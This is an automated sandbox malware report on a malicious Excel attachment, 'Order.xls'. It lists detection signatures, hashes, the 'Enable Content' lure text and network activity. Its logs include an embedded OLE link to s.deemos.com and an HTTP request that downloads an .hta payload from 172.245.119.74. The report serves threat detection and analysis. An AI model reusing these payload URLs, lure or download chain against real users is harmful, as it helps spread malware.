Windows Analysis Report
Order.xls

Overview

General Information

Sample name: Order.xls
Analysis ID: 1592075
MD5: 439a22208699135960b30717b0aeedbc
SHA1: f0a626b392d2cf72659b567e8a75d8d862195669
SHA256: b04e78fa62cab8562fdcd884fa8813a4e802c8f78bfa8c1d25db2a8684868dd0
Tags: xlsuser-abuse_ch
Infos:

Detection

Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Excel sheet contains many unusual embedded objects
Machine Learning detection for sample
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Uses a known web browser user agent for HTTP communication

Classification

AV Detection

barindex
Source: Order.xls Avira: detected
Source: Order.xls ReversingLabs: Detection: 36%
Source: Order.xls Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll Jump to behavior
Source: unknown HTTPS traffic detected: 14.103.79.10:443 -> 192.168.2.10:49990 version: TLS 1.2
Source: global traffic DNS query: name: s.deemos.com
Source: global traffic TCP traffic: 192.168.2.10:49990 -> 14.103.79.10:443
Source: global traffic TCP traffic: 192.168.2.10:49991 -> 172.245.119.74:80
Source: global traffic TCP traffic: 192.168.2.10:49990 -> 14.103.79.10:443
Source: global traffic TCP traffic: 192.168.2.10:49990 -> 14.103.79.10:443
Source: global traffic TCP traffic: 192.168.2.10:49990 -> 14.103.79.10:443
Source: global traffic TCP traffic: 192.168.2.10:49990 -> 14.103.79.10:443
Source: global traffic TCP traffic: 192.168.2.10:49990 -> 14.103.79.10:443
Source: global traffic TCP traffic: 192.168.2.10:49990 -> 14.103.79.10:443
Source: global traffic TCP traffic: 192.168.2.10:49990 -> 14.103.79.10:443
Source: global traffic TCP traffic: 192.168.2.10:49990 -> 14.103.79.10:443
Source: global traffic TCP traffic: 192.168.2.10:49990 -> 14.103.79.10:443
Source: global traffic TCP traffic: 192.168.2.10:49990 -> 14.103.79.10:443
Source: global traffic TCP traffic: 192.168.2.10:49990 -> 14.103.79.10:443
Source: global traffic TCP traffic: 14.103.79.10:443 -> 192.168.2.10:49990
Source: global traffic TCP traffic: 192.168.2.10:49990 -> 14.103.79.10:443
Source: global traffic TCP traffic: 192.168.2.10:49990 -> 14.103.79.10:443
Source: global traffic TCP traffic: 14.103.79.10:443 -> 192.168.2.10:49990
Source: global traffic TCP traffic: 14.103.79.10:443 -> 192.168.2.10:49990
Source: global traffic TCP traffic: 192.168.2.10:49990 -> 14.103.79.10:443
Source: global traffic TCP traffic: 192.168.2.10:49990 -> 14.103.79.10:443
Source: global traffic TCP traffic: 14.103.79.10:443 -> 192.168.2.10:49990
Source: global traffic TCP traffic: 14.103.79.10:443 -> 192.168.2.10:49990
Source: global traffic TCP traffic: 192.168.2.10:49990 -> 14.103.79.10:443
Source: global traffic TCP traffic: 192.168.2.10:49990 -> 14.103.79.10:443
Source: global traffic TCP traffic: 14.103.79.10:443 -> 192.168.2.10:49990
Source: global traffic TCP traffic: 14.103.79.10:443 -> 192.168.2.10:49990
Source: global traffic TCP traffic: 14.103.79.10:443 -> 192.168.2.10:49990
Source: global traffic TCP traffic: 192.168.2.10:49990 -> 14.103.79.10:443
Source: global traffic TCP traffic: 192.168.2.10:49990 -> 14.103.79.10:443
Source: global traffic TCP traffic: 192.168.2.10:49990 -> 14.103.79.10:443
Source: global traffic TCP traffic: 14.103.79.10:443 -> 192.168.2.10:49990
Source: global traffic TCP traffic: 192.168.2.10:49991 -> 172.245.119.74:80
Source: global traffic TCP traffic: 172.245.119.74:80 -> 192.168.2.10:49991
Source: global traffic TCP traffic: 192.168.2.10:49991 -> 172.245.119.74:80
Source: global traffic TCP traffic: 192.168.2.10:49991 -> 172.245.119.74:80
Source: global traffic TCP traffic: 172.245.119.74:80 -> 192.168.2.10:49991
Source: global traffic TCP traffic: 172.245.119.74:80 -> 192.168.2.10:49991
Source: global traffic TCP traffic: 192.168.2.10:49991 -> 172.245.119.74:80
Source: global traffic TCP traffic: 192.168.2.10:49991 -> 172.245.119.74:80
Source: global traffic TCP traffic: 172.245.119.74:80 -> 192.168.2.10:49991
Source: excel.exe Memory has grown: Private usage: 2MB later: 97MB
Source: Joe Sandbox View IP Address: 14.103.79.10 14.103.79.10
Source: Joe Sandbox View JA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
Source: global traffic HTTP traffic detected: GET /ZlCPR27v?&impress=verdant&gown=sincere&lightning=fretful&window HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: s.deemos.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xampp/sns/createdbestthingsforhappinesswithoutmegivenyouforher.hta HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 172.245.119.74
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /ZlCPR27v?&impress=verdant&gown=sincere&lightning=fretful&window HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: s.deemos.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xampp/sns/createdbestthingsforhappinesswithoutmegivenyouforher.hta HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 172.245.119.74
Source: global traffic DNS traffic detected: DNS query: s.deemos.com
Source: Order.xls, A3430000.0.dr String found in binary or memory: https://s.deemos.com/ZlCPR27v?&impress=verdant&gown=sincere&lightning=fretful&window
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown Network traffic detected: HTTP traffic on port 49990 -> 443
Source: unknown HTTPS traffic detected: 14.103.79.10:443 -> 192.168.2.10:49990 version: TLS 1.2

System Summary

barindex
Source: screenshot OCR: document is protected the document in If this dcxurnent was Once you have enabled 3 iting, please cl
Source: screenshot OCR: Enable Content" from the yellow bar above dcxuments the yellow bar above Sheet2 Sheet3 Ready & Acces
Source: screenshot OCR: document is protected Tab O Office 2 20 Rea the dxument in If this docurnent was the yellow bar abo
Source: screenshot OCR: Enable Content" from the yellow bar atx:yve BNAGMGS... EEGV.'XUH... EIVQSAOTAC_ EO'VRVP... Sheetz S
Source: screenshot OCR: document is protected the document in If this dcxurnent was Once you have enabled O 3 editing, pleas
Source: screenshot OCR: Enable Content" from the yellow bar above dcxuments the yellow bar above Renmks. 1 : Above price is
Source: screenshot OCR: document is protected the document in If this dcxurnent was Once you have enabled O 3 editing, pleas
Source: screenshot OCR: Enable Content" from the yellow bar above dcxuments the yellow bar above Renmks. 1 : Above price is
Source: screenshot OCR: document is protected 16 17 18 19 20 27 28 29 30 N.o.R ac VsI drop Anchor u Tanks ins s Tanks inss I
Source: screenshot OCR: Enable Content" from Final calculation started Final calculation ended Cargo arm disconnected Shippe
Source: screenshot OCR: document is protected Open the dckument in Microsoft Office previewing online is not available for 2
Source: screenshot OCR: Enable Content" from Sheetl Sheet2 Ready Accessibility: Investigate Sheet3 Final calculation started
Source: Order.xls OLE: Microsoft Excel 2007+
Source: Order.xls OLE: Microsoft Excel 2007+
Source: Order.xls OLE: Microsoft Excel 2007+
Source: A3430000.0.dr OLE: Microsoft Excel 2007+
Source: A3430000.0.dr OLE: Microsoft Excel 2007+
Source: Order.xls OLE indicator, VBA macros: true
Source: Order.xls Stream path 'MBD0047BAAB/\x1Ole' : https://s.deemos.com/ZlCPR27v?&impress=verdant&gown=sincere&lightning=fretful&window~9[PxqWl> RQtzF}-iik[*hpy1,,{6X`+|gL[cMnjD0`1{(+i(g*=WddEG1;;zn-8l;Mj/KSuC,Wqk%h*d`A],0YctZFNmkG9Pi8qjdVBAEjR3cYCilTaG3qtEh3qqO17QvBUvwMY4cyu4t9ESIqKt6K11qER2aBq0qzGGV5JVb1UVplt7937QdsyUMf2VuiS753J2R7r9RNhBKOCXSsDQbOYlbZ0xjXfbQL9IWgGwWwWh0pukRPLHWSHRpYwqkYDbZERe2waqE2BGt1b1OEKySqV3Xdd%[/Duxpp'1[X.+
Source: A3430000.0.dr Stream path 'MBD0047BAAB/\x1Ole' : https://s.deemos.com/ZlCPR27v?&impress=verdant&gown=sincere&lightning=fretful&window~9[PxqWl> RQtzF}-iik[*hpy1,,{6X`+|gL[cMnjD0`1{(+i(g*=WddEG1;;zn-8l;Mj/KSuC,Wqk%h*d`A],0YctZFNmkG9Pi8qjdVBAEjR3cYCilTaG3qtEh3qqO17QvBUvwMY4cyu4t9ESIqKt6K11qER2aBq0qzGGV5JVb1UVplt7937QdsyUMf2VuiS753J2R7r9RNhBKOCXSsDQbOYlbZ0xjXfbQL9IWgGwWwWh0pukRPLHWSHRpYwqkYDbZERe2waqE2BGt1b1OEKySqV3Xdd%[/Duxpp'1[X.+
Source: ~DFBA0519920D42AF1E.TMP.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: classification engine Classification label: mal72.winXLS@4/9@1/2
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE File created: C:\Users\user\Desktop\A3430000 Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\{A785AF81-2D41-4623-851C-82C67F9C24C6} - OProcSessId.dat Jump to behavior
Source: Order.xls OLE indicator, Workbook stream: true
Source: A3430000.0.dr OLE indicator, Workbook stream: true
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: Order.xls ReversingLabs: Detection: 36%
Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\Order.xls"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288 Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Automated click: OK
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Automated click: OK
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common Jump to behavior
Source: Order.xls Static file information: File size 1275904 > 1048576
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll Jump to behavior
Source: ~DFBA0519920D42AF1E.TMP.0.dr Initial sample: OLE indicators vbamacros = False
Source: Order.xls Initial sample: OLE indicators encrypted = True
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\splwow64.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\splwow64.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\splwow64.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\splwow64.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\splwow64.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\splwow64.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\splwow64.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\splwow64.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\splwow64.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\splwow64.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\splwow64.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\splwow64.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\splwow64.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: Order.xls Stream path 'Workbook' entropy: 7.99915790275 (max. 8.0)
Source: A3430000.0.dr Stream path 'Workbook' entropy: 7.99586369302 (max. 8.0)
Source: C:\Windows\splwow64.exe Window / User API: threadDelayed 742 Jump to behavior
Source: C:\Windows\splwow64.exe Last function: Thread delayed
Source: C:\Windows\splwow64.exe Last function: Thread delayed
Source: C:\Windows\splwow64.exe Thread delayed: delay time: 120000 Jump to behavior
Source: C:\Windows\splwow64.exe Thread delayed: delay time: 120000 Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information queried: ProcessInformation Jump to behavior
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs